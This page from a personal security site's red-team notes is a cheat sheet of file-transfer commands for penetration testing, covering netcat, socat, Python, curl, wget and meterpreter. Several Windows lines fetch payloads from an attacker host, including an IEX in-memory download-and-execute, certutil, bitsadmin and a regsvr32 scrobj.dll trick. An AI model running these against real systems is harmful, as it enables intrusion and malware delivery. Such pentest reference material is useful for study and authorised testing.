Robert H. Osborne
  • Home
  • Contact Us
  • Links
    • The B.T.P.S Sec Pack
    • YouTube Channel
    • Certifications
    • HTB Writeups
    • HTB Profile
    • PS Gallery
  • Videos
    • BHack 2020 Presentation
    • Securing Windows 10
    • Securing LDAP over SSL
    • Securing WinRM over HTTPS
    • Securing RADIUS Wireless
    • Securing RADIUS Wired
    • Securing FTPS Windows
    • Securing RDP
    • Securing SMB
    • Securing DNS
    • Securing FTPS Linux
    • Securing SSH
    • Learning Vim
    • Learn Tmux
    • Learn Windows Terminal
    • Learn ConEmu
  • Blogs
    • Not Intutive PS Behavior
    • Searching Event Logs
    • Write PowerShell Cmdlets
  • Red Team Notes
    • Enumeration
    • Pivoting Proxies
    • File Transfer
    • PrivEsc
    • Credentials
    • Firewall
    • WiFi Password Cracking
    • SSDP Spoofing
    • Ettercap Spoofing
    • ARP and DNS Spoofing
    • PowerShell Tools
    • AppLocker Bypass
    • SUID Notes
    • PHP Wrappers
    • SQL Injections
    • Certificates
    • Chroot Jail
    • Services
    • Reverse Shells
    • TTY Shell
  • Privacy Policy
Robert H. Osborne
  • Home
  • Contact Us
  • Links
  • Videos
  • Blogs
  • Red Team Notes
  • Privacy Policy

File Transfers

Download Files to Target

File Transfer Commands
HOST SIMPLE HTTP SERVER

python -m SimpleHTTPServer 80
python3 -m http.server 80

php -S 0.0.0.0:80
ruby -run -e httpd . -p 9000
busybox httpd -f -p 10000

===================

NETCAT

===================

On Receiving End

nc -l -p 1234 > out.file

On Sending End

nc -w 3 [destination] 1234 < out.file


OR


On Receving End

nc -l -p 1234 | uncompress -c | tar xvfp -

On Sending End

tar cfp - /some/dir | compress -c | nc -w 3 [destination] 1234


===================

SOCAT

===================

On Server Sending File Do

socat -u FILE:test.dat TCP-LISTEN:9876,reuseaddr

On Client Receiving File Do

socat -u TCP:127.0.0.1:9876 OPEN:out.dat,creat


OR


On Server Receving File Do

socat -u TCP-LISTEN:9876,reuseaddr OPEN:out.txt,creat && cat out.txt

On Client Sending File Do

socat -u FILE:test.txt TCP:127.0.0.1:9876


OR


# File Transfer
socat TCP4-LISTEN:443,fork file:secret_password.txt # This sets up sending a file
socat TCP4:<ip>:<port> file:received_secret_password.txt,create

=======================

PYTHON3

=======================

URLLIB REQUEST MODULE

import urllib.request
print('Beginning file download with urllib2...')
url = '<url>/<uriToFile>'
urllib.request.urlretrieve(url, '/Users/tobor/Downloads/<filename.txt>')


OR


URLLIB2 MODULE

import urllib2
filedata = urllib2.urlopen('<url>/<uriToFile>')
datatowrite = filedata.read()
with open('/Users/tobor/Downloads/file.txt', 'wb') as f:
   f.write(datatowrite)


OR


REQUESTS MODULE

import requests
print('Beginning file download with requests')
url = '<url>/<uriToFile>'
r = requests.get(url)
with open('/Users/tobor/Downloads/file.txt', 'wb') as f:
   f.write(r.content)
# Retrieve HTTP meta-data
print(r.status_code)
print(r.headers['content-type'])
print(r.encoding)


OR


WGET MODULE

import wget
print('Beginning file download with wget module')
url = '<url>/<uriToFile>'
wget.download(url, '/Users/tobor/Downloads/file.txt')



====================

WINDOWS

====================

PowerCat:

Send File:
   powercat -c 10.1.1.1 -p 443 -i C:\inputfile
Recieve File:
   powercat -l -p 8000 -of C:\inputfile


Download Powershell Script and Execute Without Touching Disk:

IEX(New-Object Net.WebClient).downloadString('<url>/<payload>') ;<methodName>


DOWNLOAD FILE

(New-Object Net-WebClient).DownloadFile('http://ip:80/file.txt', 'C:\Temp\file.txt')
 


Download To File:

Invoke-WebRequest "http://<ip>:<port>/<in file>" -OutFile "<out file>"

Download File With PowerShell

Start-BitsTransfer http://<attackerip>:<port>/<payload> -Destinations C:\Path\To\Save\File.ps1
 


Download File With Command Prompt

certutil.exe -urlcache -split -f http://<attackMachineIP>:<port>/Payload.exe C:\Path\To\Save\File



Download File With BitsAdmin

bitsadmin /transfer debjob /download /priority normal <url> <pathToSaveTo>


OR


bitsadmin /create /download <JobName>

bitsadmin /addFile <JobName> http://<attackerip>:<port>/payload.exe C:\Path\To\Download\To.txt

bitsadmin /setproxysettings <JobName> OVERRIDE proxy1:80 "<local>"

bitsadmin /resume <JobName>

bitsadmin /monitor

bitsadmin /complete <JobName>



Download and Execute File Using RegSVR

regsvr32 /s /n /u /i:<url>:<port>/<payload> scrobj.dll


#----------------------------------------------

# Start FTP server on attack machine
systemctl start ftp
cp nc.exe /ftphome/nc.exe

# Create txt file of ftp commands to download file
echo "open <ftp server ip address>" >> ftp.txt
echo "USER <username>" >> ftp.txt
echo "<password>" >> ftp.txt
echo "bin" >> ftp.txt
echo "GET nc.exe" >> ftp.txt
echo "bye" >> ftp.txt

# In shell on Windows perform non-interactive download of netcat
ftp -v -n -s:ftp.txt


#======================================

# CREATE WGET.EXE on WINDOWS

#======================================

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >>wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs


#======================================

# CREATE WGET.PS1 & DOWNLOAD IT ON WINDOWS

#======================================

echo $webClient = New-Object System.Net.WebClient >> wget.ps1
echo $url = "http://<attack_ip>/wget.exe" >> wget.ps1
echo $file = "evil.exe" >> wget.ps1
echo $webClient.DownloadFile($url,$file) >> wget.ps1



====================

LINUX

====================

WGET

wget -O <Preferred_FileName> <url>



CURL

Curl To Download File

curl -o output.file <url>/<uritoFile>
curl -O <uritoFile>

curl --remote-name <url>/<uritoFile>

curl -u Username:Password <url>/<uritoFile>



Curl to Download Multiple Files

curl -O <url>/<uritoFile> -O <url>/<uritoFile>



Curl To Download Web Page

curl -o nixcraft.html <url>/<uritoFile>



Curl to Download From SSH Server

curl -u username sftp://server1.cyberciti.biz/path/to/file.txt

OR

curl -u username: --key ~/.ssh/id_rsa --pubkey ~/.ssh/id_rsa.pub 


Curl to Download From FTP Server

curl ftp://username:passwordd@<domain.com>:21/path/to/backup.tar.gz



METERPRETER

download -f <pathToFile> <SaveFileLocation>

Copyright © 2020 Robert H. Osborne - OsbornePro LLC.

  • Privacy Policy

Cookie Policy

If accepted the cookies on this site are used for my own interest in who is viewing the site. I will not profit off of this information in any way.

DeclineAccept & Close